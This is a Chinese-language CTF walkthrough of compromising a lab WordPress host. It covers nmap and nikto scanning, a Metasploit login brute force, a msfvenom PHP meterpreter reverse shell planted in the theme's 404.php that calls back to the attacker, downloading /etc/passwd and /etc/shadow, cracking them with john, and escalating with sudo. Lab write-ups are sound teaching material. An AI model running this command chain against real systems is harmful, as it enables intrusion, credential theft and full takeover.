【CTF】暴力破解实战
kali:192.168.223.131
target:192.168.223.172
通过arp-scan -l
获取目标IP为192.168.223.172,nmap扫描一下,发现开启21、22、80端口
nmap -p- -A 192.168.223.172
没东西出现,nikto扫一下
nikto -h http://192.168.223.172
扫出一个/secret,打开看一下是一个wordpress网站,根据常识登陆界面在wp-login.php
进入后台,但是不知道账号密码,通过msfconsole进行爆破
msfconsole
use /auxiliary/scanner/http/wordpress_login_enum
set username admin
set pass_file /usr/share/wordlists/dirb/common.txt //加载字典
set fargeturi /secret/
set rhosts 192.168.223.172
exploit
发现爆破不出来,直接burp进行爆破,得知账号密码都是admin,admin
然后和之前一样生成木马
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.223.131 lport=4444 -f raw > /root/msfshell.php
生成木马写入后开启监听
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.223.131
set lport 4444
exploit
找到404页面,通过审计wordpress的CMS获取路径,此时目标上线
192.168.223.172/secret/wp-content/themes/twentyseventeen/404.php
在msfconsole中下载passwd和shadow文件到kali
download /etc/passwd
download /etc/shadow
开启新终端对两个文件进行合并,生成一个crack文件,此时将两个文件放到一块
unshadow passwd shadow > crack
使用john破解用户和密码为marlinspike,marlinspike
john crack
回到原来的msf界面
shell
python -c 'import pty;pty.spawn("/bin/bash")'
su - marlinspike
//输入密码后登陆进去
sudo -l
//发现三个ALL,直接提权
sudo su